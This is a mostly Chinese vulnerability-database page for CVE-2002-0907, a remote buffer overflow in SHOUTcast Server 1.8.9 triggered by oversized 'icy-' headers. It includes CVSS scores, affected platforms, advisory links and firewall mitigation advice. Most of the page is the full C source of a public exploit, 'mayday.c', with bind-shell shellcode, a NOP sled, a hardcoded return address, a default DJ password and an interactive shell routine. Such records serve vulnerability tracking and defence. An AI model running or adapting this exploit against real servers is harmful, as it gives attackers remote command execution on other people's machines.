CVE-2002-0907
CVSS7.5
发布时间 :2002-10-04 00:00:00
修订时间 :2008-09-05 16:29:16
NMCOES    

[原文]Buffer overflow in SHOUTcast 1.8.9 and other versions before 1.8.12 allows a remote authenticated DJ to execute arbitrary code on the server via a long value in a header whose name begins with "icy-".


[CNNVD]Nullsoft SHOUTCast远程缓冲区溢出漏洞(CNNVD-200210-227)

        
        Nullsoft SHOUTcast Server是一款用于广播流声讯系统的服务器程序,可使用在多种Linux和Unix操作系统下,也可以使用在Microsoft Windows操作系统下。
        Nullsoft SHOUTcast Server存在远程缓冲区溢出,可导致远程认证的DJ提供超大的数据给服务器而产生溢出。
        攻击者必须在知道DJ密码的情况下,登录SHOUTcast Server监听的8001端口,并向服务器提交如下所示的超大数据:
        password\n
        icy-name: netric
        icy-[doesn't matter]: [big....buffer]
        由于服务器对提交的数据缺少充分的边界检查,可导致堆栈破坏,精心构建提交的数据,可能以SHOUTcast Server进程的权限在目标服务器上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:nullsoft:shoutcast_server:1.8.9::solaris
cpe:/a:nullsoft:shoutcast_server:1.8.9::mac_os_x
cpe:/a:nullsoft:shoutcast_server:1.8.9::linux
cpe:/a:nullsoft:shoutcast_server:1.8.9::freebsd
cpe:/a:nullsoft:shoutcast_server:1.8.9::win32

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0907
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0907
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200210-227
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/4934
(VENDOR_ADVISORY)  BID  4934
http://www.iss.net/security_center/static/9251.php
(VENDOR_ADVISORY)  XF  shoutcast-icy-remote-bo(9251)
http://archives.neohapsis.com/archives/bugtraq/2002-06/0016.html
(UNKNOWN)  BUGTRAQ  20020604 SHOUTcast 1.8.9 bufferoverflow

- 漏洞信息

Nullsoft SHOUTCast远程缓冲区溢出漏洞
高危 边界条件错误
2002-10-04 00:00:00 2005-10-20 00:00:00
远程  
        
        Nullsoft SHOUTcast Server是一款用于广播流声讯系统的服务器程序,可使用在多种Linux和Unix操作系统下,也可以使用在Microsoft Windows操作系统下。
        Nullsoft SHOUTcast Server存在远程缓冲区溢出,可导致远程认证的DJ提供超大的数据给服务器而产生溢出。
        攻击者必须在知道DJ密码的情况下,登录SHOUTcast Server监听的8001端口,并向服务器提交如下所示的超大数据:
        password\n
        icy-name: netric
        icy-[doesn't matter]: [big....buffer]
        由于服务器对提交的数据缺少充分的边界检查,可导致堆栈破坏,精心构建提交的数据,可能以SHOUTcast Server进程的权限在目标服务器上执行任意指令。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 在防火墙上对Nullsoft SHOUTcast Server进行访问控制,只允许可信用户访问。
        厂商补丁:
        Nullsoft
        --------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.shoutcast.com/

- 漏洞信息 (21511)

Nullsoft SHOUTCast 1.8.9 Remote Buffer Overflow Vulnerability (EDBID:21511)
multiple remote
2002-06-04 Verified
0 eSDee
N/A [点击下载]
source: http://www.securityfocus.com/bid/4934/info

Nullsoft SHOUTcast Server is used to broadcast Shoutcast music. SHOUTcast Server is available for Windows, Linux and a number of other Unix based platforms.

A remote buffer overflow vulnerability has been reported in some versions of SHOUTCast Server. An authenticated DJ may supply oversized data to the server, which will then overflow a memory buffer. Execution of arbitrary code is reported to be possible.

This vulnerability has been confirmed on SHOUTCast Server for Windows, FreeBSD and Linux. Mac OS X and Solaris may also be vulnerable, this has not however been confirmed. 

/*           _ ________            _____                        ______
 *  __ ___ ____       /____.------`    /_______.------.___.----`  ___/____ _______
 *       _/    \ _   /\   __.  __//   ___/_    ___.  /_\    /_    |     _/
 * ___ ._\    . \\  /__  _____/ _    /     \_  |    /__      |   _| slc | _____ _
 *    - -------\______||--._____\---._______//-|__    //-.___|----._____||
 * mayday.c - SHOUTcast v1.8.9 remote exploit   / \  / "Never trust a DJ"
 * by eSDee of Netric (www.netric.org)             \/
 *
 * Tested on:
 * - Redhat 7.x
 * - Redhat 6.x
 * - Suse 6.x
 * - Suse 7.x
 *
 * More information about this bug can be found at:
 * http://www.netric.org/advisories/netric-adv006.txt
 *
 */

#include <stdio.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <getopt.h>

char shellcode[] =  /* binds to port 10000 by Bighawk */
        "\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd"
        "\x80\x89\xc7\x52\x66\x68\x27\x10\x43\x66\x53\x89\xe1\x6a\x10"
        "\x51\x57\x89\xe1\xb0\x66\xcd\x80\xb0\x66\xb3\x04\xcd\x80\x50"
        "\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f"
        "\x49\xcd\x80\x41\xe2\xf8\x51\x68\x6e\x2f\x73\x68\x68\x2f\x2f"
        "\x62\x69\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80";

int sock;
void usage();
void shell();

int
main (int argc,char *argv[])
{
        char buf1[1130];
        char buf2[1800];
        char host[256];
        char pass[256]="changeme";

        int i=0;
        int c=0;
        int port=8001;
        unsigned int ret = 0x08069687;

        fprintf(stdout,"SHOUTcast v1.8.9 remote exploit by eSDee of Netric\n");
        fprintf(stdout,"-----------------------------------(www.netric.org)\n");

        while((c=getopt(argc,argv,"t:p:a:")) !=EOF)
        {
                switch(c)
                {
                        case 'p':
                                port=atoi(optarg);
                                if ((port <= 0) || (port > 65535)) {
                                        fprintf(stderr,"Invalid port.\n\n");
                                        exit(1);
                                }
                                break;
                        case 'a':
                                memset(pass,0x0,sizeof(pass));
                                strncpy(pass,optarg,sizeof(pass) - 1);
                                break;
                        case 't':
                                memset(host,0x0,sizeof(host));
                                strncpy(host,optarg,sizeof(host) - 1);
                                break;
                        default:
                                usage(argv[0]);
                                exit(1);
                                break;
                }
        }


        if (strlen(host) == 0) {
                usage(argv[0]);
                exit(1);
        }
        sock=openhost(host, port);

        if (sock==-1) {
                fprintf(stderr,"- Unable to connect.\n\n");
                exit(1);
        }

        write(sock, pass, strlen(pass));
        write(sock, "\n", 1);

        memset(buf2,  0x0, sizeof(buf2));
        memset(buf1, 0x90, sizeof(buf1));

        for(i=0;i < strlen(shellcode); i++) buf1[i+600] = shellcode[i];

        buf1[759] = (ret & 0x000000ff);
        buf1[760] = (ret & 0x0000ff00) >> 8;
        buf1[761] = (ret & 0x00ff0000) >> 16;
        buf1[762] = (ret & 0xff000000) >> 24;

        buf1[1120] = 0x0;

        sprintf(buf2,   "icy-name: netric\r\n"
                        "icy-aim: %s\r\n"
                        "\r\n", buf1);

        fprintf(stdout, "Connected, sending code...\n");
        fprintf(stdout, "Ret: 0x%08x\n", ret);

        write(sock, buf2, strlen(buf2));
        sleep(2);
        close(sock);

        sock=openhost(host, 10000);

        if (sock==-1) {
                fprintf(stderr, "Exploit failed!\n\n");
                exit(1);
        }

        fprintf(stdout, "Exploiting succesful.\n");
        fprintf(stdout, "---------------------------------------------------\n");
        shell();
        return 0;
}

void
usage(char *prog)
{
        fprintf(stderr,"Usage: %s -t [-pa]\n",prog);
        fprintf(stderr,"-t target       The host to attack.\n");
        fprintf(stderr,"-a password     Default password is \"changeme\".\n");
        fprintf(stderr,"-p port         Default port is 8001.\n\n");
}

int
openhost(char *host,int port)
{
        struct sockaddr_in addr;
        struct hostent *he;

        he=gethostbyname(host);

        if (he==NULL) return -1;
        sock=socket(AF_INET, SOCK_STREAM, getprotobyname("tcp")->p_proto);
        if (sock==-1) return -1;

        memcpy(&addr.sin_addr, he->h_addr, he->h_length);

        addr.sin_family=AF_INET;
        addr.sin_port=htons(port);

        if(connect(sock, (struct sockaddr *)&addr, sizeof(addr)) == -1)
        sock=-1;
        return sock;
}

void shell() /* taken from an old wuftp exploit */
{
        fd_set  fd_read;
        char buff[1024], *cmd="/bin/uname -a;/usr/bin/id;\n";
        int n;

        FD_ZERO(&fd_read);
        FD_SET(sock, &fd_read);
        FD_SET(0, &fd_read);

        send(sock, cmd, strlen(cmd), 0);
        while(1) {
                FD_SET(sock,&fd_read);
                FD_SET(0,&fd_read);
                if(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break;
                if( FD_ISSET(sock, &fd_read) ) {
                        if((n=recv(sock,buff,sizeof(buff),0))<0){
                                fprintf(stderr, "EOF\n");
                                exit(2);
                        }
                        if(write(1,buff,n)<0)break;
                }

                if ( FD_ISSET(0, &fd_read) ) {
                        if((n=read(0,buff,sizeof(buff)))<0){
                                fprintf(stderr,"EOF\n");
                                exit(2);
                        }
                        if(send(sock,buff,n,0)<0) break;
                }
                usleep(10);
                }
                fprintf(stderr,"Connection lost.\n");
                exit(0);
}

		

- 漏洞信息

14449
SHOUTcast Authenticated DJ icy- Header Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

2002-06-04 Unknow
2002-06-04 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Nullsoft SHOUTCast Remote Buffer Overflow Vulnerability
Boundary Condition Error 4934
Yes No
2002-06-04 12:00:00 2009-07-11 01:56:00
Discovered by eSDee <eSDee@netric.org>.

- 受影响的程序版本

NullSoft Shoutcast Server 1.8.9 Win32
NullSoft Shoutcast Server 1.8.9 Solaris
NullSoft Shoutcast Server 1.8.9 Mac OS X
NullSoft Shoutcast Server 1.8.9 Linux
NullSoft Shoutcast Server 1.8.9 FreeBSD

- 漏洞讨论

Nullsoft SHOUTcast Server is used to broadcast Shoutcast music. SHOUTcast Server is available for Windows, Linux and a number of other Unix based platforms.

A remote buffer overflow vulnerability has been reported in some versions of SHOUTCast Server. An authenticated DJ may supply oversized data to the server, which will then overflow a memory buffer. Execution of arbitrary code is reported to be possible.

This vulnerability has been confirmed on SHOUTCast Server for Windows, FreeBSD and Linux. Mac OS X and Solaris may also be vulnerable, this has not however been confirmed.

- 漏洞利用

eSDee &lt;eSDee@netric.org&gt; has provided an exploit for Linux based servers:

- 解决方案

Reportedly, this issue will be resolved in release 1.8.12 of the SHOUTCast Server.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站